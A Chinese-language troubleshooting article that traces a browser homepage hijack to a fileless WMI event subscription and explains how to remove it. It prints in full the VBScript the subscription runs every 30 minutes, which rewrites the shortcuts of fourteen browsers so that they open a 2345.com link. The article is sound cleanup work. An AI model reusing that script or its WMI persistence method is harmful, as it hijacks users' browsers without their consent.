IE,火狐以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法[图文]
近日在网上相续看到有网友表示自己在下载使用了verycd下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:ie、chrome、firefox、opera、safari、maxthon,均相同症状,检查浏览器首页设置——均正常!
最后发现,原来快速启动栏的ie浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后ie快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。
之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。
打开processmonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改win7下opera快速启动图标路径类似如下:
c:\users\iefans\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\opera12.01 1532.lnk
查找资料,发现这应该是一个通过wmi发起的定时自动运行脚本。要查看wmi事件,到以下地址下载wmitool并安装
安装后打开wmi event viewer,点击左上角register for events,弹出connect to namespace框,填入“root\subscription”(手工复制粘贴啊,默认出现的不是这个),确定,出现下图:
点击左侧_eventfilter:name="unown_filter",再至右侧右键点击activescripteventconsume r name="unown",右键选择view instant properties,如下图:
查看scripttext项可知,这是一段vbscript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在wmi数据库中)。
受到影响的浏览器有(各色浏览器,差不多齐了):
"iexplore.exe", "chrome.exe", "firefox.exe", "360chrome.exe", "360se.exe", "sogouexplorer.exe", "opera.exe", "safari.exe", "maxthon.exe", "ttraveler.exe", "theworld.exe", "baidubrowser.exe", "liebao.exe", "qqbrowser.exe"
具体代码如下:
on error resume next:const link = "http://www.2345.com/?kunown":browsers = array("iexplore.exe", "chrome.exe", "firefox.exe", "360chrome.exe", "360se.exe", "sogouexplorer.exe", "opera.exe", "safari.exe", "maxthon.exe", "ttraveler.exe", "theworld.exe", "baidubrowser.exe", "liebao.exe", "qqbrowser.exe"):set odic = createobject("scripting.dictionary"):for each browser in browsers:odic.add lcase(browser), browser:next:set fso = createobject("scripting.filesystemobject"):set wshshell = createobject("wscript.shell"):strdesktop = "c:\users\gemini\desktop":strallusersdesktop = wshshell.specialfolders("allusersdesktop"):quicklaunch = "c:\users\gemini\appdata\roaming\microsoft\internet explorer\quick launch":userpinnedstartmenu = quicklaunch & "\user pinned\startmenu":userpinnedtaskbar = quicklaunch & "\user pinned\taskbar":for each file in fso.getfolder(strdesktop).files:if lcase(fso.getextensionname(file.path)) = "lnk" then:set oshelllink = wshshell.createshortcut(file.path):path = oshelllink.targetpath:name = fso.getbasename(path) & "." & fso.getextensionname(path):if odic.exists(lcase(name)) then:oshelllink.arguments = link:if file.attributes and 1 then:file.attributes = file.attributes - 1:end if:oshelllink.save:end if:end if:next:for each file in fso.getfolder(strallusersdesktop).files:if lcase(fso.getextensionname(file.path)) = "lnk" then:set oshelllink = wshshell.createshortcut(file.path):path = oshelllink.targetpath:name = fso.getbasename(path) & "." & fso.getextensionname(path):if odic.exists(lcase(name)) then:oshelllink.arguments = link:if file.attributes and 1 then:file.attributes = file.attributes - 1:end if:oshelllink.save:end if:end if:next:if fso.folderexists(quicklaunch) then:for each file in fso.getfolder(quicklaunch).files:if lcase(fso.getextensionname(file.path)) = "lnk" then:set oshelllink = wshshell.createshortcut(file.path):path = oshelllink.targetpath:name = fso.getbasename(path) & "." & fso.getextensionname(path):if odic.exists(lcase(name)) then:oshelllink.arguments = link:if file.attributes and 1 then:file.attributes = file.attributes - 1:end if:oshelllink.save:end if:end if:next:end if:if fso.folderexists(userpinnedstartmenu) then:for each file in fso.getfolder(userpinnedstartmenu).files:if lcase(fso.getextensionname(file.path)) = "lnk" then:set oshelllink = wshshell.createshortcut(file.path):path = oshelllink.targetpath:name = fso.getbasename(path) & "." & fso.getextensionname(path):if odic.exists(lcase(name)) then:oshelllink.arguments = link:if file.attributes and 1 then:file.attributes = file.attributes - 1:end if:oshelllink.save:end if:end if:next:end if:if fso.folderexists(userpinnedtaskbar) then:for each file in fso.getfolder(userpinnedtaskbar).files:if lcase(fso.getextensionname(file.path)) = "lnk" then:set oshelllink = wshshell.createshortcut(file.path):path = oshelllink.targetpath:name = fso.getbasename(path) & "." & fso.getextensionname(path):if odic.exists(lcase(name)) then:oshelllink.arguments = link:if file.attributes and 1 then:file.attributes = file.attributes - 1:end if:oshelllink.save:end if:end if:next:end if
最后,清除方法:在wmi event viewer中将“_eventfilter:name="unown_filter"”项目右键删除!
删不掉?
到wmitool安装路径(例如:c:\program files (x86)\wmi tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!
还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!
暂时就这么多了,还有没有其它影响的话,用用再看吧!
解决方法来自:gemini